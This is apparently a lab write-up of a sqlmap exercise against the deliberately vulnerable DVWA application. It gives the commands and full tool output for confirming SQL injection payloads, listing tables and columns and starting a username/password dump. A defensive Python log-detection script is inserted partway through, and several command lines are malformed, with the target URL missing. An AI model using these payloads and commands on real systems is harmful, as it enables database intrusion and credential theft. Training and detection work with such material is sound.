2022-10-10
Web penetration testing in practice: SQLMAP
I. Experiment name
Web penetration testing in practice: SQLMAP
II. Experiment purpose and requirements
Become familiar with the principles of SQL injection vulnerabilities.
Become familiar with using the SQLMAP tool.
1. Obtain database information: database vulnerabilities, database name, database version, etc.
python sqlmap.py -u "--cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" --current-db
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "--cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" --current-db
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|

legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:26:19 /2022-05-26/

[09:26:20] [INFO] testing connection to the target URL
[09:26:20] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:26:20] [INFO] testing if the target URL content is stable
[09:26:20] [INFO] target URL content is stable
[09:26:20] [INFO] testing if GET parameter 'id' is dynamic
[09:26:20] [WARNING] GET parameter 'id' does not appear to be dynamic
[09:26:20] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[09:26:20] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[09:26:20] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[09:26:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:26:28] [WARNING] reflective value(s) found and filtering out
[09:26:28] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:26:28] [INFO] testing 'Generic inline queries'
[09:26:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[09:26:29] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="Me")
[09:26:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:26:29] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:26:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:26:30] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:26:30] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:26:30] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:26:30] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:26:30] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:26:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:30] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[09:26:30] [INFO] testing 'MySQL inline queries'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:26:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:26:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:26:40] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:26:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:26:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:26:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:26:40] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:26:40] [INFO] target URL appears to have 2 columns in query
[09:26:40] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[09:26:40] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[09:26:43] [INFO] testing if GET parameter 'Submit' is dynamic
[09:26:43] [WARNING] GET parameter 'Submit' does not appear to be dynamic
[09:26:43] [WARNING] heuristic (basic) test shows that GET parameter 'Submit' might not be injectable
[09:26:43] [INFO] testing for SQL injection on GET parameter 'Submit'
[09:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:26:43] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:26:43] [INFO] testing 'Generic inline queries'
[09:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[09:26:45] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[09:26:46] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[09:26:47] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[09:26:47] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[09:26:49] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[09:26:49] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[09:26:50] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:26:51] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:26:51] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[09:26:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[09:26:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:26:53] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:26:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:26:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:26:55] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:26:56] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:26:56] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:26:57] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:26:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:59] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:27:00] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:27:01] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:27:02] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:27:02] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:27:03] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[09:27:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[09:27:04] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[09:27:05] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[09:27:05] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[09:27:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[09:27:05] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[09:27:05] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[09:27:05] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[09:27:05] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[09:27:05] [INFO] testing 'MySQL inline queries'
[09:27:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:27:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:27:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:27:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:27:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:27:08] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[09:27:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[09:27:10] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[09:27:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[09:27:11] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[09:27:13] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[09:27:14] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[09:27:14] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[09:27:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[09:27:16] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[09:27:16] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[09:27:17] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[09:27:17] [INFO] testing 'MySQL AND time-based blind (ELT)'
[09:27:18] [INFO] testing 'MySQL OR time-based blind (ELT)'
[09:27:19] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[09:27:19] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[09:27:19] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:20] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[09:27:20] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[09:27:20] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[09:27:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[09:27:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[09:27:39] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[09:27:44] [WARNING] GET parameter 'Submit' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3725 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:27:44] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:27:44] [INFO] fetching current database
current database: 'dvwa'
[09:27:44] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:27:44] [WARNING] your sqlmap version is outdated

[*] ending @ 09:27:44 /2022-05-26/
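The run above ends with four injection techniques confirmed on the id parameter (boolean-based blind, error-based, time-based blind and UNION query), each with the payload sqlmap settled on. From the defender's side, those same payload shapes are what a web-server log review looks for, together with sqlmap's default User-Agent. The following Python is an added example, not part of this lab write-up and not sqlmap's own code: it parses Apache combined-format access-log lines, URL-decodes the query string and tags each request with the technique class it matches. The log lines are constructed for the example, the /vulnerabilities/sqli/ path is assumed to be DVWA's SQL-injection page (the lab's URL is not shown above), and the User-Agent string is built from the version shown in the sqlmap banner.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" log format. The sample lines below are constructed, not DVWA's real logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# One signature per technique class that sqlmap confirmed on 'id' in the run above.
TECHNIQUES = {
    "boolean-based blind": re.compile(r"\b(?:OR|AND)\s+(?:NOT\s+)?\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"\bFLOOR\s*\(\s*RAND\s*\(|\bEXTRACTVALUE\s*\(|\bUPDATEXML\s*\(", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)|\bBENCHMARK\s*\(", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}

def classify_request(path):
    """Return the technique classes whose signature appears in the URL-decoded query string."""
    query = path.partition("?")[2]
    decoded = unquote_plus(query)  # sqlmap sends its payloads percent-encoded
    return {name for name, rx in TECHNIQUES.items() if rx.search(decoded)}

def analyse_log(lines):
    """Return (client ip, sorted technique list, sqlmap user-agent?) for each suspicious line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line: skip rather than guess at fields
        techniques = classify_request(m.group("path"))
        sqlmap_ua = "sqlmap" in m.group("ua").lower()
        if techniques or sqlmap_ua:
            hits.append((m.group("ip"), sorted(techniques), sqlmap_ua))
    return hits

# Constructed User-Agent, assembled from the version in the banner above.
UA = "sqlmap/1.5.6.2#dev (https://sqlmap.org)"

# Constructed sample: one legitimate request, then one request per technique sqlmap reported,
# carrying the payloads from the summary above in their percent-encoded on-the-wire form.
SAMPLE_LOG = [
    '192.168.232.1 - - [26/May/2022:09:25:50 +0800] "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4200 "-" "Mozilla/5.0"',
    f'192.168.232.1 - - [26/May/2022:09:26:29 +0800] "GET /vulnerabilities/sqli/?id=1%27%20OR%20NOT%201427%3D1427%23&Submit=Submit HTTP/1.1" 200 4200 "-" "{UA}"',
    f'192.168.232.1 - - [26/May/2022:09:26:30 +0800] "GET /vulnerabilities/sqli/?id=1%27%20AND%20%28SELECT%208864%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a6a7671%2C%28SELECT%20%28ELT%288864%3D8864%2C1%29%29%29%2C0x71787a7071%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29--%20OXhb&Submit=Submit HTTP/1.1" 200 4300 "-" "{UA}"',
    f'192.168.232.1 - - [26/May/2022:09:26:40 +0800] "GET /vulnerabilities/sqli/?id=1%27%20AND%20%28SELECT%205848%20FROM%20%28SELECT%28SLEEP%285%29%29%29ydqX%29--%20iPyQ&Submit=Submit HTTP/1.1" 200 4200 "-" "{UA}"',
    f'192.168.232.1 - - [26/May/2022:09:26:40 +0800] "GET /vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20CONCAT%280x717a6a7671%2C0x4142%2C0x71787a7071%29%2CNULL%23&Submit=Submit HTTP/1.1" 200 4300 "-" "{UA}"',
]

if __name__ == "__main__":
    for ip, techniques, sqlmap_ua in analyse_log(SAMPLE_LOG):
        print(ip, techniques, "sqlmap user-agent" if sqlmap_ua else "")
```

The signatures are deliberately narrow (a SLEEP call with a numeric argument, FLOOR(RAND(, a UNION ... SELECT) so that ordinary search strings do not trip them; the User-Agent check is a separate signal because it is trivially changed with --random-agent, whereas the payload grammar is not. Decoding the query string before matching matters: the raw log line contains %27 and %20, not the quote and space the regexes expect.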
2. Obtain the database table names
python sqlmap.py -u "--cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -D "dvwa" --tables
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "--cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -D "dvwa" --tables
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|

legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:32:48 /2022-05-26/

[09:32:48] [INFO] resuming back-end DBMS 'mysql'
[09:32:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:32:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:32:48] [INFO] fetching tables for database: 'dvwa'
[09:32:48] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[09:32:48] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:32:48] [WARNING] your sqlmap version is outdated

[*] ending @ 09:32:48 /2022-05-26/
3. Obtain the columns of a specified table in the database
python sqlmap.py -u "--cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" --columns
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "--cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" --columns
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|

legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:34:06 /2022-05-26/

[09:34:07] [INFO] resuming back-end DBMS 'mysql'
[09:34:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:34:07] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:34:07] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[09:34:07] [INFO] fetching current database
[09:34:07] [INFO] fetching columns for table 'users' in database 'dvwa'
[09:34:07] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+

[09:34:07] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:34:07] [WARNING] your sqlmap version is outdated

[*] ending @ 09:34:07 /2022-05-26/
4. Obtain usernames and passwords (separate the column names directly with commas)
python sqlmap.py -u "--cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" -C "user,password" --dump
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "--cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" -C "user,password" --dump
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|

legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:38:43 /2022-05-26/

[09:38:43] [INFO] resuming back-end DBMS 'mysql'
[09:38:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

